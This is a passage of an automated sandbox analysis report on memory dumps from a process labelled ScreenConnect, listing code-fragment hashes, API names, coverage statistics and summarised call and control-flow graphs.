                                                                • Opcode Fuzzy Hash: 8f99eca3d3ef50962a92c70537597836aed2e13e36dddbf1051fc86849cd368f
                                                                • Instruction Fuzzy Hash: 7A2125B5504280DFDF0ADF58E9C0B27BF65FBC8314F60C169E9090B25AC336D456CAA2
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2905210852.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_113d000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                • Instruction ID: 9f29243ba7a0c0182f8e49c9fb0e8d5f3a4e3c6f76e4c939ced7bf67029864e8
                                                                • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                • Instruction Fuzzy Hash: 4011AF76504680CFDF16CF54D9C4B16BF72FB98324F24C6A9D9090B25AC336D45ACBA1
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2905210852.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_113d000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 54474d5eb18b7307bb1782bc44064b7c9f0e95c99eee0e5af57db0767c25d68e
                                                                • Instruction ID: b5b79fbc3a935426a4c79b5c4be0fb5aae8e8f69f28ceae369ad509103ccfa17
                                                                • Opcode Fuzzy Hash: 54474d5eb18b7307bb1782bc44064b7c9f0e95c99eee0e5af57db0767c25d68e
                                                                • Instruction Fuzzy Hash: AB016D7100D3C09FD7164B259C94652BFB4EF43624F1984CBE9848F1A7C2695845CB71
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2905210852.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_113d000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9d5bb5013902a1bdcbc09ee976bf7b533ecb00e7fc8f205a5550dc01bd6febbc
                                                                • Instruction ID: 62f9456e8a3dfd27abc3cf20c584acfb6dccea3606a00dbecbe6d7ab48df812a
                                                                • Opcode Fuzzy Hash: 9d5bb5013902a1bdcbc09ee976bf7b533ecb00e7fc8f205a5550dc01bd6febbc
                                                                • Instruction Fuzzy Hash: CC012B314083409AEB194A69DD84767FF98EFC17A4F58C429ED080B18AC379D841CAB2
                                                                APIs
                                                                • RtlGetVersion.NTDLL(0000009C), ref: 01534DBE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2905619270.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_1530000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: Version
                                                                • String ID: `Q^q
                                                                • API String ID: 1889659487-1948671464
                                                                • Opcode ID: 803b368b0ff87959de50fbe009a9b11b74ee27734c4d3a618371f4b170c69746
                                                                • Instruction ID: 4d649290eb429fbb10a25fe641895b0b8d31f7ac1e40fc208e4f05ea2791c0b2
                                                                • Opcode Fuzzy Hash: 803b368b0ff87959de50fbe009a9b11b74ee27734c4d3a618371f4b170c69746
                                                                • Instruction Fuzzy Hash: 4E214571901668DFEB60DF59CC48B99FBB9FB44304F0085D9E50CA7240CB756A98CFA2

                                                                Execution Graph

                                                                Execution Coverage:12.3%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:37.5%
                                                                Total number of Nodes:8
                                                                Total number of Limit Nodes:1
execution_graph (8 nodes; rendered graph flattened to its node list, summarised here as the two call chains it contains):
• 7ffd9b408014 -> 7ffd9b40801d -> 7ffd9b4080f6 SetProcessMitigationPolicy -> 7ffd9b408152 (side edge 7ffd9b40801d -> 7ffd9b408082)
• 7ffd9b403642 -> 7ffd9b425870 CreateNamedPipeW -> 7ffd9b4259a3

                                                                Control-flow Graph

• Executed / Not Executed colouring of the rendered graph is not preserved in text.
control_flow_graph: function entry 7ffd9b716c80, basic blocks spanning 7ffd9b716c80 to 7ffd9b71750b; internal calls to 7ffd9b710c30, 7ffd9b7100a8, 7ffd9b716a10, 7ffd9b716a38, 7ffd9b716a48, 7ffd9b713cc0 and 7ffd9b7156a8; no direct Win32 API calls in this graph.
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: H
                                                                • API String ID: 0-2852464175
                                                                • Opcode ID: 67f6ad16443050e2667190e62294dfc2a776f21f1e15a8b5e4a5bfd070b95f37
                                                                • Instruction ID: 3fd0926676ef002c59e572c4d393ab704a67724b1466225b59be20ffdea54c56
                                                                • Opcode Fuzzy Hash: 67f6ad16443050e2667190e62294dfc2a776f21f1e15a8b5e4a5bfd070b95f37
                                                                • Instruction Fuzzy Hash: 8C423771B0EB4A4FE7A59BA884747B837E2EF94340F16467AD04DC71F2DD29BA058360

                                                                Control-flow Graph

• Executed / Not Executed colouring of the rendered graph is not preserved in text.
control_flow_graph: function entry 7ffd9b403642, 5 basic blocks spanning 7ffd9b403642 to 7ffd9b4259dc; block 7ffd9b4258e4-7ffd9b4259a1 calls CreateNamedPipeW.
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2912669562.00007FFD9B400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B400000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b400000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: CreateNamedPipe
                                                                • String ID:
                                                                • API String ID: 2489174969-0
                                                                • Opcode ID: e6537c8f466aa65bd4890be5ae007b38dda0bf1f7f542ba53b842a955ab0907f
                                                                • Instruction ID: e528a5f226f4a839f6e306b76b4947bdaac5d54488742d54a8c94eb64e09b5a2
                                                                • Opcode Fuzzy Hash: e6537c8f466aa65bd4890be5ae007b38dda0bf1f7f542ba53b842a955ab0907f
                                                                • Instruction Fuzzy Hash: 2851907191CA1C8FDB68EF5C9846BE9B7E0FB59714F1442AEE04ED3251CB70A9818BC1

                                                                Control-flow Graph

• Executed / Not Executed colouring of the rendered graph is not preserved in text.
control_flow_graph: function entry 7ffd9b7100f2, basic blocks spanning 7ffd9b7100a7 to 7ffd9b710969 and 7ffd9b714a10 to 7ffd9b714cf3; internal calls to 7ffd9b710088, 7ffd9b7100a8, 7ffd9b713cb0, 7ffd9b713cc0 and 7ffd9b713cd0; no direct Win32 API calls in this graph.
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0ead8f84a6e7dc6fc5365332daa50fcf0b2138f20a8cb97b214f553fada3f8b9
                                                                • Instruction ID: 3b2b22a0c3c164ee229130fc668dd3f5fc2dc5d4696fb3a41e48fa36a342193f
                                                                • Opcode Fuzzy Hash: 0ead8f84a6e7dc6fc5365332daa50fcf0b2138f20a8cb97b214f553fada3f8b9
                                                                • Instruction Fuzzy Hash: C8921631B0EB4A4FEBA9EB6C84B16A437E1FF55710B1502BAD089CB1F3DD19E9428750
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5b6adbe31c1734ea536967b77443a943b71e6367dd7eab7935b935d4f2de2350
                                                                • Instruction ID: 887f232794c6a34ede0d97c829927e352c409a3746738b4bef1b4bb0ff8a78fe
                                                                • Opcode Fuzzy Hash: 5b6adbe31c1734ea536967b77443a943b71e6367dd7eab7935b935d4f2de2350
                                                                • Instruction Fuzzy Hash: 58122772B0EB4E0BEB799B6894657B437D1EF95340F1602BAD88DC71F7DD28A9028350
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9939a5c75320af70d9b682713eb8f86698a01ec205ee924eea9c68ee200c6d8d
                                                                • Instruction ID: 6f2fdeb5856cb8498685369745d8105079908f7d9cd4273cf9952bc74f49184b
                                                                • Opcode Fuzzy Hash: 9939a5c75320af70d9b682713eb8f86698a01ec205ee924eea9c68ee200c6d8d
                                                                • Instruction Fuzzy Hash: C302B371B19B494FEBA8EB688465B7973E1FFA4300F01467EE44EC32B6DE24E9418741

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2912669562.00007FFD9B400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B400000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b400000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: MitigationPolicyProcess
                                                                • String ID:
                                                                • API String ID: 1088084561-0
                                                                • Opcode ID: 0b97f3df3222fe961f0238f701fc26f5e396a164d30392ee55c4399d1d63db13
                                                                • Instruction ID: da387da3858cb8b399e71f1bec61a7462a7c5ad03191ad0dd394e824d832f2b5
                                                                • Opcode Fuzzy Hash: 0b97f3df3222fe961f0238f701fc26f5e396a164d30392ee55c4399d1d63db13
                                                                • Instruction Fuzzy Hash: E6514B31D1DB494FDB28AFA8D84A5E97BE0EF55310F04417FE089C3192DE68A846CB92
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6ab5a92cd2c6cea6499d58efd1b8d9181fee59f4412230153fb89766b97b4435
                                                                • Instruction ID: b6f75448f0b9af3a96a345621a223fd39c1c3d37afe27a689fb838c299d6b43c
                                                                • Opcode Fuzzy Hash: 6ab5a92cd2c6cea6499d58efd1b8d9181fee59f4412230153fb89766b97b4435
                                                                • Instruction Fuzzy Hash: 5EC14A32A0EB4E0FEBA9EA6884619B573D1EF51350B05037ED44D871F6EE15FA0A8790
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4eb0c86dd6b504069a86db11e69c3d352fa3480f7f6688af95a79c11056ef9d6
                                                                • Instruction ID: 804d998d4da57e92600967d1b101f6cd1946d1a4eb1f24bf7a91711243377a5a
                                                                • Opcode Fuzzy Hash: 4eb0c86dd6b504069a86db11e69c3d352fa3480f7f6688af95a79c11056ef9d6
                                                                • Instruction Fuzzy Hash: C2A19A32B1EF8E0FEB69DB6884656B577E1EF55300B0502FAD448C71F3EE18A9068391
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e6552026151da91ed7932f0a29a72bb073f99e5b4cff70b5f00d403909f8e82d
                                                                • Instruction ID: ebffdd56e68e7b7ebb2ec43ad35232e23479f4ca3f75d0be91b5f2b8a27446ff
                                                                • Opcode Fuzzy Hash: e6552026151da91ed7932f0a29a72bb073f99e5b4cff70b5f00d403909f8e82d
                                                                • Instruction Fuzzy Hash: 9391513460DB494FDBDCEF58C4A0AA177A1FF9930472546E9C059CB2ABCA25E846C790
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 94fdb4d02bdffdd9ff560d38aee2c1ee11ea6bb145fd9555eae4c46dc290b988
                                                                • Instruction ID: 29ecd5d8fd6dd9e46716c3e985d675a868b3f8ff896f3d64e69b148f8cffd000
                                                                • Opcode Fuzzy Hash: 94fdb4d02bdffdd9ff560d38aee2c1ee11ea6bb145fd9555eae4c46dc290b988
                                                                • Instruction Fuzzy Hash: C5811471B0FB4F0EEB6A9BA844712747791EF55350F0A02BAD48DCB1F7DD18A9058361
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0f3dc95ca35622dfdfd9b9a9d90ed9b8c1d459fe0b221a252c874c2e5fb5bb29
                                                                • Instruction ID: 59412e270de95f9048acf1cdff092d61225b28f0114458f621c49a0970aa6121
                                                                • Opcode Fuzzy Hash: 0f3dc95ca35622dfdfd9b9a9d90ed9b8c1d459fe0b221a252c874c2e5fb5bb29
                                                                • Instruction Fuzzy Hash: 5971256290F79A1BE321ABBC98755F57FA0EF02624B0903F7D0C98F4B3DD1829458391
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 38b8d3679927fd8d4beb573efee4394efab408a4a94afc6a85150a7dae1f798f
                                                                • Instruction ID: 78ddaef71276330bceed201cbb7627936d3a706c8276c443bbd6003f748b950a
                                                                • Opcode Fuzzy Hash: 38b8d3679927fd8d4beb573efee4394efab408a4a94afc6a85150a7dae1f798f
                                                                • Instruction Fuzzy Hash: 0B51D37270DA494FEB98EF588461BA573D2FFA4314F0501B9D45DC72A6DE25F802CB50
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cfae716b13460d0ce7c5abc5dd8e9928c36b97ea3c93284580f2c10357a0b30d
                                                                • Instruction ID: d7a2f3414536516db6a2b0c105527bbac235786293f4c67160b877eb1e941291
                                                                • Opcode Fuzzy Hash: cfae716b13460d0ce7c5abc5dd8e9928c36b97ea3c93284580f2c10357a0b30d
                                                                • Instruction Fuzzy Hash: EC417932B0EF4D8BEBA4DAA898711ED77D2EFA4300B091279D48CC31B2DF216902C350
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 32fa65e5c9bf922ae6d3d542d539a088f3874bd6034f7dc7c87444d180b4ca8d
                                                                • Instruction ID: f47aad3207ce798c5fe5381a7e40d6145ab9a8b447ee9996a9f9a68d94036011
                                                                • Opcode Fuzzy Hash: 32fa65e5c9bf922ae6d3d542d539a088f3874bd6034f7dc7c87444d180b4ca8d
                                                                • Instruction Fuzzy Hash: 7631B222A0F7CA1FE76696A85C295703FE4DF5362070A12FBD48CCB0B3D95C69478362
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9a81b0a1badee60410d06c7951b6ef39cda8453c4cf99200ee6bec87adc974de
                                                                • Instruction ID: 8bda51fb0fca91799e9a2c1551520e2ee60f232b1a2cbfcad2b18392d24d44d8
                                                                • Opcode Fuzzy Hash: 9a81b0a1badee60410d06c7951b6ef39cda8453c4cf99200ee6bec87adc974de
                                                                • Instruction Fuzzy Hash: 85313932B0EA4C0FD7E4DA6CA89D2703BD1EF69251B0911BBE44CC7272E912AC838341
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fa0e045bf474d58a738ef7368a12737384de3ffd75116a711eef760b18ad202c
                                                                • Instruction ID: 789eb411dd72b39189137b695161c0b54c1186ca5400e2d66ec5b14b113577b2
                                                                • Opcode Fuzzy Hash: fa0e045bf474d58a738ef7368a12737384de3ffd75116a711eef760b18ad202c
                                                                • Instruction Fuzzy Hash: 2D11E733B2EE4D4AEBA496AC6C303FC3691EF44344F0501BAE45DE31F2DE159900C255
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 67dc5781de36023482a1d85c1937820f5762f2bd454a9fc4df7b5aec2b9fd2bd
                                                                • Instruction ID: e0c6e5dba8880422461c7708bcf62e5ba553590756f598f46f15a0e0ae6d607d
                                                                • Opcode Fuzzy Hash: 67dc5781de36023482a1d85c1937820f5762f2bd454a9fc4df7b5aec2b9fd2bd
                                                                • Instruction Fuzzy Hash: C511D6B6E0EB8C4BEFA5CFA458752A83FA1FF55300F06019AE058D31B2DE25A605C711
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 260f3d32a84ddf77100e3dbb6a8037414892b676bfa0cdb0e114336015634939
                                                                • Instruction ID: 93dcfcd2b6ae40b1def8e2688379a464156181bc13a14b2bc332061728090068
                                                                • Opcode Fuzzy Hash: 260f3d32a84ddf77100e3dbb6a8037414892b676bfa0cdb0e114336015634939
                                                                • Instruction Fuzzy Hash: 8011E315B0EB5B0BF779926848703753AE1DF46344F1A41BEC44AC61F6DC5CAD818B21
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0d11332927ffba3414b241692d5466f06929ae02b7d290593d47b1ae1c9e3d69
                                                                • Instruction ID: 1fd1b6d4450f02466ae776ced53ce9c5f178ebb836436f8a465f7a574d2266ee
                                                                • Opcode Fuzzy Hash: 0d11332927ffba3414b241692d5466f06929ae02b7d290593d47b1ae1c9e3d69
                                                                • Instruction Fuzzy Hash: 7011D031B19A494FDB98EF58C061B6577A2FF68304F0541A8C44DCB2A6DE35F9018750
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 29f4af5353159140abdd24943532e96e7e380cc19ca5217dea5598337cec5af8
                                                                • Instruction ID: 59a9f7901ac4ccc77b1a98bfde2e0b3c42b1a8e3eca259d6256b6d0558e599ed
                                                                • Opcode Fuzzy Hash: 29f4af5353159140abdd24943532e96e7e380cc19ca5217dea5598337cec5af8
                                                                • Instruction Fuzzy Hash: 9A116D71A19A494FDB98EF58C061BA577A2FF68304B0541A8D44DCB2A6DE35F9018B50
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d7196df8e148b8ea7587aca7428b324624bfdd3a1de7f88652157553ddcd5ce3
                                                                • Instruction ID: c681ab4551abb3e8dafa043e9dbce35e6963ee70b94847a28b33b48839c9a9b1
                                                                • Opcode Fuzzy Hash: d7196df8e148b8ea7587aca7428b324624bfdd3a1de7f88652157553ddcd5ce3
                                                                • Instruction Fuzzy Hash: D901F92170EB8E1FD395DA6C9CA82703FE4EF5A21130902F7E48CCB173E9156D468351
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 585ffe74928692dd6f50b07c6fe6b99c128fb2d25376178a03825889af239593
                                                                • Instruction ID: 70d609469e5c3dc8642a19d6b80748496df9d70e581b0eb37d1b2f2002e9c6bb
                                                                • Opcode Fuzzy Hash: 585ffe74928692dd6f50b07c6fe6b99c128fb2d25376178a03825889af239593
                                                                • Instruction Fuzzy Hash: BCF06D2144E2964FD35297B098A5AE47FF4EF47210B0F42E7E884CB4B3D90C5D8A83B2
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 477a4374a3d0fd79bbcac9c6ff102969f42be5c8a9717460857c8f1c94700bab
                                                                • Instruction ID: 9f5a18f443f2d11227479a5973345ed9c0b5918a4c0938cd0d3bb0b3965ed37d
                                                                • Opcode Fuzzy Hash: 477a4374a3d0fd79bbcac9c6ff102969f42be5c8a9717460857c8f1c94700bab
                                                                • Instruction Fuzzy Hash: EFE0D82150F3D40FDB539B34C4688E43F60EE1721030901EBD481CF0B3E5148A89C751
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 59d6ffd4b789994f4b84a3060b34465e726003487ff530fcb9ed8544cb82eef6
                                                                • Instruction ID: 0dcfc0d9da17978b2c3f3fa931a8c3081049b923eb732f426b17ea2b071d7bc9
                                                                • Opcode Fuzzy Hash: 59d6ffd4b789994f4b84a3060b34465e726003487ff530fcb9ed8544cb82eef6
                                                                • Instruction Fuzzy Hash: 2AE08C1AA4E71B02FB7C62B578A17B570D09F06359F4A527EE41E800E9DC9C9E808962
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b97fccc7889625f5eca2ee109298a8560da280eeae52af600eda47cd04acfe8f
                                                                • Instruction ID: cb2a0b5e5d37122c73e409a5a8295ef909aeac42d0da15acbfe337e14620ad8c
                                                                • Opcode Fuzzy Hash: b97fccc7889625f5eca2ee109298a8560da280eeae52af600eda47cd04acfe8f
                                                                • Instruction Fuzzy Hash: 40C04C11B6996D0A95E8A25C34656FC41C1D78866578916F2E80CD229EEC4C5D9213C1
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 065b225b4bd21a7db7e91e9574bd1d4eabdd0240b98abe7cfcf9def78f5a9bbd
                                                                • Instruction ID: 2b426b4b892e66926e38079b7d152408c710202f45e844ca4b5c0168b749b047
                                                                • Opcode Fuzzy Hash: 065b225b4bd21a7db7e91e9574bd1d4eabdd0240b98abe7cfcf9def78f5a9bbd
                                                                • Instruction Fuzzy Hash: 8DC09B10F1E64E46F364EFA8C47567D21526FCC208B564535D04D8A1A6CD3C67016545
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2918950673.00007FFD9B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ffd9b710000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 81f7068886334a1449be0078e8a23011a27193cba12888c68009e0ed2993e715
                                                                • Instruction ID: 3cf0476b2c3aec2e7e4992c20cd59567a13fbe2b9e5e6cc78176976459b75f3b
                                                                • Opcode Fuzzy Hash: 81f7068886334a1449be0078e8a23011a27193cba12888c68009e0ed2993e715
                                                                • Instruction Fuzzy Hash: 46A00200F4FA1E45E17165D8402127D50410F95608A265635D04E8A1B6CD2C6F4265A6

                                                                Execution Graph

                                                                Execution Coverage:11.3%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:10
                                                                Total number of Limit Nodes:2
                                                                execution_graph (node listing; rendered graph not recoverable from the page): two paths, one from 7ffd9b7292c4 via 7ffd9b7292cd to the GlobalMemoryStatusEx call at 7ffd9b729485 (returning to 7ffd9b729495), the other from 7ffd9b418014 via 7ffd9b41801d to the SetProcessMitigationPolicy call at 7ffd9b4180f6 (returning to 7ffd9b418152)

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph (basic-block and edge listing; rendered graph not recoverable from the page): blocks spanning 7ffd9b729287 to 7ffd9b7294c2, with the GlobalMemoryStatusEx call in block 7ffd9b729485-7ffd9b729493
                                                                APIs
                                                                Memory Dump Source
